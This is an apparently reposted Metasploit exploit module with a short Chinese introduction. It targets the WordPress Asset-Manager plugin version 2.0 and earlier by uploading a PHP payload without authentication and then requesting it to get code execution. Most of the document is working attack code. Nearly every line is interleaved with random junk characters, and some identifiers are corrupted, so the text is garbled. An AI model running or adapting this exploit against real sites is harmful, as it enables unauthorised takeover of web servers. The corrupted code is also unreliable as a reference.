这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
/ u* \* G5 Z. _$ J( x3 X% a
* M% v$ n; f! g2 Z##
( |2 t! O8 f" f# o& m. E- f; o# This file is part of the Metasploit Framework and may be subject to* f, Z& W, o! J# q: K
# redistribution and commercial restrictions. Please see the Metasploit
+ t0 [! @8 G. {' F# Framework web site for more information on licensing and terms of use.
9 y" p; s. V3 u# http://metasploit.com/framework/
/ x d& U- d3 g- n) W% V7 c##
3 c. T4 z; q0 m5 d# ]# }2 |
. c# T" d- G: b' u' ^9 B$ ~* l( ~& Crequire 'msf/core'4 y: ]3 w# J# d2 c1 P
require 'msf/core/exploit/php_exe'
. O4 U- j: `1 l5 t1 p
# h, r. R+ C+ H6 X5 l' B7 _class Metasploit3 < Msf::Exploit::Remote
( b5 {' w7 L2 V3 v" q' b Rank = ExcellentRanking/ E# c1 I3 | I8 Q
" g# D! N8 m5 L+ H# z" z include Msf::Exploit::Remote::HttpClient
1 u6 r. a- T" e* n1 b! X* B! h include Msf::Exploit: hpEXE
1 y& V; c; w; g4 A5 D0 d
8 B/ Z, g" R: X- M6 ?# C3 j' Q! \$ @ def initialize(info = {})( G3 Z0 B& i7 q/ r
super(update_info(info,
6 t6 Y$ h& Y9 y: g7 D 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
% w4 S/ H3 s1 L8 D 'Description' => %q{
( y# O2 L6 d; B/ ~9 O8 z This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress- T' i$ o2 z5 g- }4 q- `
plugin. By abusing the upload.php file, a malicious user can upload a file to a
/ b; M% |1 |% f& j; q temp directory without authentication, which results in arbitrary code execution.
7 y$ o1 o, z( X: n' T9 y6 ]' {( C },
3 A' f- h2 \) |" r0 C) e 'Author' =>! e0 E2 i* D/ i# P
[8 H3 H# d! S$ j6 h
'Sammy FORGIT', # initial discovery
9 {* {1 j& B* m4 ]$ y 'James Fitts <fitts.james[at]gmail.com>' # metasploit module
$ y/ u9 u5 n, d* ]& ]: ` ],% g2 ^4 c7 i3 U6 ^9 c. V# P' R9 z
'License' => MSF_LICENSE,
3 F# E7 x5 s) j1 e# | 'References' =>% _/ R' `3 s% m$ x/ z2 e
[3 v6 K5 m" T$ y) b
[ 'OSVDB', '82653' ],
* Y7 a& S, ~: f7 m- x" m1 S [ 'BID', '53809' ],
" s/ g: E0 j' p6 H [ 'EDB', '18993' ],) C/ v$ l* l* B; E+ [' m$ [1 C8 P
[ 'URL', 'http:// www.myhack58.com /' ]
% X5 }- a' n& X ],9 U& }: g; ?) x+ U: E
'Payload' =>; e' u' v1 y5 j, p; V
{& a2 w: a9 i Z- d2 f) B; e' i
'BadChars' => "\x00",4 G6 g8 y" }8 O% @# @' m2 N" Y" P
},
+ |) Y: [0 Z! [ X$ H: N 'Platform' => 'php',
+ U3 K- ?& |, z4 _) ] 'Arch' => ARCH_PHP,
% p0 A3 d" D/ Z7 D7 r/ P! R8 E: p 'Targets' =>( P4 i1 y* N6 ^) p" G% H2 i
[
2 w0 U( c( E; @6 s3 g [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],2 T. q! }9 b+ K9 `
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
* S( @* p8 P/ e1 @, H" ]( y ],
% Q D7 e/ K4 {+ e 'DefaultTarget' => 0,: p6 [* v- |* m" y2 o% T8 C% W6 w
'DisclosureDate' => 'May 26 2012'))
5 e2 e' O$ a" w
' O& `1 _1 C' Z5 l2 ` register_options(
2 k# A$ H& y. z5 w1 k6 d [
0 T7 b! M! F/ \; c# f' C OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
2 G+ G4 @, a) n6 Q: F d& d& m ], self.class)9 d; t* u8 X+ }% B1 m
end
* W5 L; B$ @* q 8 F/ P, W) H7 P5 E1 m$ `# P- \
def exploit
" \3 v7 Q$ T) n# h3 r; r T; L) |; r( R uri = target_uri.path
: t% a2 x& y$ q uri << '/' if uri[-1,1] != '/'
- w9 u) N- T6 j8 m0 }, {6 } peer = "#{rhost}:#{rport}" [& N [- |! l! I W. ~
payload_name = "#{rand_text_alpha(5)}.php"
0 M, l. l- L( D9 ~+ t& \9 [4 @- ] php_payload = get_write_exec_payload(:unlink_self=>true) |$ z% x. a1 e# r" L8 ?- ~( i% V
7 x6 h, x+ V! Y/ J7 _0 C, r2 R
data = Rex::MIME::Message.new
+ i( l; Z7 `6 M% j. U" {8 b data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")" o3 }, P- G+ T |
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
6 l5 s6 {, [7 w* Q
, s3 ^6 J2 A' v: J& u( g print_status("#{peer} - Uploading payload #{payload_name}")
% f$ u2 S& H$ }5 B; r/ N res = send_request_cgi({
+ |6 b; {2 d1 l1 ~9 q7 q 'method' => 'POST',
3 i0 w6 V0 M/ ?) j" D/ s- S) p 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",8 O. g h- {4 w+ h* G$ r0 w
'ctype' => "multipart/form-data; boundary=#{data.bound}",5 [1 z& w! l4 O
'data' => post_data& L+ T! M- A/ ` T* U
})
$ |0 T: L$ [% l+ s' I) {& [) L* Z' h7 L
; S: G) e: N$ }' x/ n if not res or res.code != 200 or res.body !~ /#{payload_name}/
4 ^4 v2 Z# m/ W, H3 @ fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
; @/ d5 @$ S4 |' D* I0 S6 t% D2 ~; Iend
/ I1 Y) Y F# Y$ J/ @! o 6 R: N2 n' i5 w) C" A# O
print_status("#{peer} - Executing payload #{payload_name}")
2 F) G1 t- B( ?/ Y* y- f3 M res = send_request_raw({
; g# j- c. V1 `9 r7 R 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",8 q* D# b- _+ {) [# Z/ O
'method' => 'GET'
: U' \2 V- Y( i3 G! N L9 v$ f& \ })
# q9 q0 x O+ W. s
' e! V Z. n- i3 S if res and res.code != 200
1 }4 T1 P% V! ^1 j( t Z, ] fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")! e- P- c& q- X$ V3 [/ q. w
end
5 ]9 @8 \$ c) Z) z2 U end
* p9 W1 B' b6 p% Rend
# s' I* H0 k) R" c5 ] M2 o( N) D0 { |